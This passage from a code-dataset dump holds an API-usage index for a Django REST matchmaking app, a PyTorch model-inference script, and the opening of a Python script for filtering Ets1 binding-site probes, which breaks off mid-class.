"django_filters.rest_framework.CharFilter", "line_number": 753, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 753, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 754, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 754, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 755, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 755, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 756, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 756, "usage_type": "name"}, {"api_name": "models.RegisterUser", "line_number": 759, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 807, "usage_type": "name"}, {"api_name": "serializers.SearchSerializer", "line_number": 808, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.filter", "line_number": 826, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 826, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 826, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 826, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 827, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 828, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 829, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 830, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 831, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 833, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 833, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 837, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 838, "usage_type": "name"}, {"api_name": "serializers.LikeSerializer", "line_number": 839, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 843, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 843, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 843, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 852, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 852, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 852, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.create", "line_number": 854, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 854, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 854, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 856, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 856, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 856, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 858, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 858, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 858, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 867, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 867, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 870, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 870, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 870, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.create", "line_number": 872, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 872, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 872, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 875, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 875, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 875, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 877, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 877, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 877, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 886, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 886, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 836, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 836, "usage_type": "argument"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 890, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 891, "usage_type": "name"}, {"api_name": "serializers.SuperLikeSerializer", "line_number": 892, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 896, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 896, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 896, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 904, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 904, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 904, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.create", "line_number": 906, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 906, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 906, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 909, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 909, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 909, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 911, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 911, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 911, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 920, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 920, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 923, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 923, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 923, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.create", "line_number": 925, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 925, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 925, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 928, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 928, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 928, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 930, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 930, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 930, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 939, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 939, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 889, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 889, "usage_type": "argument"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 942, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 943, "usage_type": "name"}, {"api_name": "serializers.MatchedUserSerializer", "line_number": 944, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 948, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 948, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 948, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 951, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 951, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 951, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 957, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 957, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 957, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 959, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 959, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 959, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 972, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 972, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 976, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 977, "usage_type": "name"}, {"api_name": "serializers.DeleteMatchSerializer", "line_number": 978, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 982, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 982, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 982, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 984, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 984, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 990, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 990, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 990, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 997, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 997, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 997, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 998, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 998, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1000, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1000, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 975, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 975, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 1004, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 1005, "usage_type": "name"}, {"api_name": "serializers.DeleteSuperMatchSerializer", "line_number": 1006, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1011, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1011, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1011, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1013, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1013, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1020, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1020, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1020, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1028, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1028, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1028, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1029, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1029, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1031, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1031, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 1003, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 1003, "usage_type": "argument"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1035, "usage_type": "name"}, {"api_name": "models.RequestMeeting", "line_number": 1036, "usage_type": "name"}, {"api_name": "serializers.RequestMeetingSerializer", "line_number": 1037, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1043, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1043, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1043, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1045, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1045, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1045, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1048, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1048, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1048, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1051, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1051, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1051, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1052, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1052, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1052, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1053, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1053, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1053, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1055, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1055, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1055, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 1056, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 1056, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 1056, "usage_type": "name"}, {"api_name": "models.RequestMeeting.objects.create", "line_number": 1063, "usage_type": "call"}, {"api_name": "models.RequestMeeting.objects", "line_number": 1063, "usage_type": "attribute"}, {"api_name": "models.RequestMeeting", "line_number": 1063, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 1066, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 1066, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 1066, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1076, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1076, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1078, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1078, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 1034, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 1034, "usage_type": "argument"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 1081, "usage_type": "name"}, {"api_name": "models.RequestMeeting", "line_number": 1082, "usage_type": "name"}, {"api_name": "serializers.MeetingStatusSerializer", "line_number": 1083, "usage_type": "name"}, {"api_name": "models.RequestMeeting.objects.all", "line_number": 1084, "usage_type": "call"}, {"api_name": "models.RequestMeeting.objects", "line_number": 1084, "usage_type": "attribute"}, {"api_name": "models.RequestMeeting", "line_number": 1084, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1092, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1092, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1092, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1095, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1095, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1095, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1098, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1098, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1098, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 1101, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 1101, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 1101, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1111, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1114, "usage_type": "name"}, {"api_name": "models.ScheduleMeeting", "line_number": 1115, "usage_type": "name"}, {"api_name": "serializers.ScheduleMeetingSerializer", "line_number": 1116, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1121, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1121, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1121, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1122, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1122, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1122, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1129, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1129, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1129, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1132, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1132, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1132, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1135, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1135, "usage_type": "name"}, {"api_name": "models.ScheduleMeeting.objects.create", "line_number": 1137, "usage_type": "call"}, {"api_name": "models.ScheduleMeeting.objects", "line_number": 1137, "usage_type": "attribute"}, {"api_name": "models.ScheduleMeeting", "line_number": 1137, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 1146, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 1146, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 1146, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1155, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1155, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1157, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1157, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1160, "usage_type": "name"}, {"api_name": "models.Feedback", "line_number": 1161, "usage_type": "name"}, {"api_name": "serializers.FeedbackSerializer", "line_number": 1162, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 1165, "usage_type": "name"}, {"api_name": "models.ContactUs", "line_number": 1166, "usage_type": "name"}, {"api_name": "serializers.ContactUsSerializer", "line_number": 1167, "usage_type": "name"}, {"api_name": "models.ContactUs.objects.all", "line_number": 1168, "usage_type": "call"}, {"api_name": "models.ContactUs.objects", "line_number": 1168, "usage_type": "attribute"}, {"api_name": "models.ContactUs", "line_number": 1168, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 1171, "usage_type": "name"}, {"api_name": "models.AboutUs", "line_number": 1172, "usage_type": "name"}, {"api_name": "serializers.AboutUsSerializer", "line_number": 1173, "usage_type": "name"}, {"api_name": "models.AboutUs.objects.all", "line_number": 1174, "usage_type": "call"}, {"api_name": "models.AboutUs.objects", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "models.AboutUs", "line_number": 1174, "usage_type": "name"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 1177, "usage_type": "name"}, {"api_name": "models.AboutUs", "line_number": 1178, "usage_type": "name"}, {"api_name": "serializers.AboutUsSerializer", "line_number": 1179, "usage_type": "name"}, {"api_name": "models.AboutUs.objects.all", "line_number": 1180, "usage_type": "call"}, {"api_name": "models.AboutUs.objects", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "models.AboutUs", "line_number": 1180, "usage_type": "name"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 1183, "usage_type": "name"}, {"api_name": "models.ContactUs", "line_number": 1184, "usage_type": "name"}, {"api_name": "serializers.ContactUsSerializer", "line_number": 1185, "usage_type": "name"}, {"api_name": "models.ContactUs.objects.all", "line_number": 1186, "usage_type": "call"}, {"api_name": "models.ContactUs.objects", "line_number": 1186, "usage_type": "attribute"}, {"api_name": "models.ContactUs", "line_number": 1186, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1189, "usage_type": "name"}, {"api_name": "serializers.SocialUserSerializer", "line_number": 1190, "usage_type": "name"}, {"api_name": "models.RegisterUser.objets.get", "line_number": 1208, "usage_type": "call"}, {"api_name": "models.RegisterUser.objets", "line_number": 1208, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1208, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1209, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1209, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1209, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1211, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1212, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1214, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1215, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.create", "line_number": 1217, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1217, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1217, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.create", "line_number": 1234, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 1234, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 1234, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1237, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1237, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1237, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1294, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1294, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1297, "usage_type": "name"}, {"api_name": "serializers.SocialUserSerializer", "line_number": 1298, "usage_type": "name"}, {"api_name": "models.RegisterUser.objets.get", "line_number": 1316, "usage_type": "call"}, {"api_name": "models.RegisterUser.objets", "line_number": 1316, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1316, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1317, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1317, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1317, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1319, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1320, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1322, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 1323, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.create", "line_number": 1325, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1325, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1325, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.create", "line_number": 1342, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 1342, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 1345, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 1345, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1402, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1402, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 1405, "usage_type": "name"}, {"api_name": "serializers.PopUpNotificationSerializer", "line_number": 1406, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 1409, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 1409, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 1412, "usage_type": "name"}, {"api_name": "serializers.SubscriptionPlanSerializer", "line_number": 1413, "usage_type": "name"}, {"api_name": "models.SubscriptionPlans.objects.all", "line_number": 1414, "usage_type": "call"}, {"api_name": "models.SubscriptionPlans.objects", "line_number": 1414, "usage_type": "attribute"}, {"api_name": "models.SubscriptionPlans", "line_number": 1414, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 1459, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 1463, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1465, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1465, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 1466, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 1469, "usage_type": "call"}]} +{"seq_id": "360138686", "text": "import torch.autograd\nfrom tqdm import tqdm\nimport sys\nimport math\n\nimport src.utils as utils\n\n\nclass Inferer(object):\n def test_network(self, params, test_loader, model, criterion, optimiser, verbose=True):\n model.eval()\n\n losses = utils.AverageMeter()\n top1 = utils.AverageMeter()\n top5 = utils.AverageMeter()\n for batch_idx, batch in tqdm(enumerate(test_loader), total=len(test_loader), desc='inference', leave=False):\n # move inputs and targets to GPU\n inputs, targets = batch[0], batch[1]\n if type(batch[0]) == str:\n continue\n\n with torch.no_grad():\n device = 'cuda:' + str(params.gpuList[0])\n if params.use_cuda:\n inputs, targets = inputs.cuda(device, non_blocking=True), targets.cuda(device, non_blocking=True)\n\n # perform inference\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n\n prec1, prec5 = utils.accuracy(outputs.data, targets.data)\n\n losses.update(loss.item())\n top1.update(prec1.item())\n top5.update(prec5.item())\n\n if verbose:\n tqdm.write('Loss: {}, Top1: {}, Top5: {}'.format(losses.avg, top1.avg, top5.avg))\n\n return (losses.avg, top1.avg, top5.avg)\n", "sub_path": "src/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 1343, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "src.utils.AverageMeter", "line_number": 13, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 13, "usage_type": "name"}, {"api_name": "src.utils.AverageMeter", "line_number": 14, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 14, "usage_type": "name"}, {"api_name": "src.utils.AverageMeter", "line_number": 15, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 15, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.autograd.no_grad", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 22, "usage_type": "name"}, {"api_name": "src.utils.accuracy", "line_number": 31, "usage_type": "call"}, {"api_name": "src.utils", "line_number": 31, "usage_type": "name"}, {"api_name": "tqdm.tqdm.write", "line_number": 38, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "5538652", "text": "import urllib.request\nimport os, subprocess, pathlib\nimport configparser\nimport datetime\nfrom collections import OrderedDict\n\nfrom tqdm import tqdm\nfrom collections import defaultdict\nfrom itertools import chain\n\nimport pandas as pd\n\n# we need to import the package folder and libsvm\n# TODO: need to make this cleaner\nimport sys\nsys.path.append(\"probefilter\")\nsys.path.append(\"probefilter/libsvm-3.23/python\")\n# from sitesfinder.imads import iMADS\n# from sitesfinder.imadsmodel import iMADSModel\n# from sitesfinder.plotcombiner import PlotCombiner\n# from sitesfinder.pbmescore import PBMEscore\n# from sitesfinder.sequence import Sequence\n\n'''\nSummarize\nlab-archive -> note the result\ninformation about the data in the plot\n'''\n\n# tagsize = 36\n# macs_p = 0.01\n\n#bedpath = \"/data/gordanlab/vincentius/cooperative_probe/hg19_0005_Ets1.bed\"\nbedpath = \"../imads_files/predictions/hg19_0005_Ets1_filtered.bed\"\n\n# Analysis directory\nescore_short_path = \"../escores/ets1_escores.txt\"\nescore_map_path = \"../escores/index_short_to_long.csv\"\n\n# for iMADS, must specify cores and model files\nmodelcores = [\"GGAA\", \"GGAT\"]\nmodelpaths = [\"../imads_files/models/ets1/ETS1_100nM_Bound_filtered_normalized_transformed_20bp_GGAA_1a2a3mer_format.model\",\n \"../imads_files/models/ets1/ETS1_100nM_Bound_filtered_normalized_transformed_20bp_GGAT_1a2a3mer_format.model\"]\nmodelwidth = 20 # TODO: confirm if we can get length without manually specify it\nimads_cutoff = 0.2128\nmodel_kmers = [1,2,3]\n\nescore_cutoff = 0.4\n\n# ============================\n\n# outdir = \"../result/%s\" % chipname\ninit_analysis_file = \"sitefiles_list.txt\" # this is file obtained after running Rscript\n\n# From https://stackoverflow.com/questions/15644964/python-progress-bar-and-downloads\nclass DownloadProgressBar(tqdm):\n def 